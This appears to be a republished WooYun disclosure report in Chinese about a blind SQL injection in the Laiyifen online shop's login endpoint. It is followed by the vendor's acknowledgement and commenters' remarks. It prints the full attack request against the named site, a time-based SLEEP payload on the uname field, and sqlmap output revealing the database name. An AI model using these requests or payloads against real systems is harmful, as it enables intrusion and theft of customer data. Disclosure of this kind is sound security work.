来伊份官方商城某处SQL盲注可致80W+用户数据泄露（第二弹）

2015年8月15日20:17:44评论274 views字数 224阅读0分44秒阅读模式

摘要

2014-11-19：细节已通知厂商并且等待厂商处理中
2014-11-21：厂商已经确认，细节仅向厂商公开
2014-12-01：细节向核心白帽子及相关领域专家公开
2014-12-11：细节向普通白帽子公开
2014-12-21：细节向实习白帽子公开
2015-01-03：细节向公众公开

漏洞概要关注数(7) 关注此漏洞

缺陷编号： WooYun-2014-83889

漏洞标题：来伊份官方商城某处SQL盲注可致80W+用户数据泄露（第二弹）

漏洞作者： pandada

提交时间： 2014-11-19 20:02

公开时间： 2015-01-03 20:04

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

好人做到底，我给你又找到一处盲注。这回能不给我高点分，让我从此不再是路人！

详细说明：

注入点说明：uname是注入点，如图中星号所示

code 区域

POST /index.php/openapi/pam_callback/login/module/pam_passport_basic/type/member/appid/b2c/redirect/L2luZGV4LnBocC9wYXNzcG9ydC1wb3N0X2xvZ2luLUwybHVaR1Y0TG5Cb2NDOXRaVzFpWlhJdWFIUnRiQT09Lmh0bWw%3D HTTP/1.1
 Content-Length: 175
 Content-Type: application/x-www-form-urlencoded
 X-Requested-With: XMLHttpRequest
 Referer: http://www.laiyifen.com:80/
 Cookie: vary=b0ce119e2261931586e0e8bebe87b1121a94ee60638487365167a950e7783a9a; laiyifen_cookie=553648906.20480.0000; s=4833654e485fd985efdc4b368115d1f4; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1416322579
 Host: www.laiyifen.com
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 Accept: */*
 
 forward=&password=g00dPa%24%24w0rD&uname=*

漏洞证明：

code 区域

sqlmap identified the following injection points with a total of 778 HTTP(s) requests:
 ---
 Place: (custom) POST
 Parameter: #1*
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: forward=&password=g00dPa$$w0rD&uname=" AND SLEEP(5) AND "IQDW"="IQDW
 ---
 
 current user:    '%.%'
 
 current database:    'laiyifendb'

其他的我就不证明了，参照之前提交的。盲注是慢点，内容肯定是一样的罗。

修复方案：

为了用户数据安全，商家赶紧排查修复。

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2014-11-21 10:35

厂商回复：

非常感谢pandada兄和乌云的支持，非常感谢！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-11-20 09:33 | 紫衣大侠 ( 普通白帽子 | Rank:296 漏洞数:30 | 打杂的～～)

2

post的吧~~

1# 回复此人
2014-11-20 09:44 | pandada ( 实习白帽子 | Rank:91 漏洞数:20 | To be a warrior is not a simple matter o...)

1

@紫衣大侠对的对的，嘿嘿

2# 回复此人
2014-11-20 11:02 | 紫霞仙子 ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队，啥都干不成！！！)

1

好吧，昨晚后悔没报让你提前了。。。。。。。

3# 回复此人
2014-11-20 11:42 | 紫衣大侠 ( 普通白帽子 | Rank:296 漏洞数:30 | 打杂的～～)

1

@紫霞仙子 ......

4# 回复此人
2014-11-21 10:49 | cuger ( 普通白帽子 | Rank:209 漏洞数:48 | 都说爱笑的人运气不会太差，废话，运气太差...)

2

别光感谢啊，拿出实际行动，来一份呗，^_^

5# 回复此人

漏洞概要 关注数(7) 关注此漏洞

缺陷编号： WooYun-2014-83889

漏洞标题： 来伊份官方商城某处SQL盲注可致80W+用户数据泄露（第二弹）

相关厂商： laiyifen.com

漏洞作者： pandada

提交时间： 2014-11-19 20:02

公开时间： 2015-01-03 20:04

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(7) 关注此漏洞

漏洞标题：来伊份官方商城某处SQL盲注可致80W+用户数据泄露（第二弹）

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分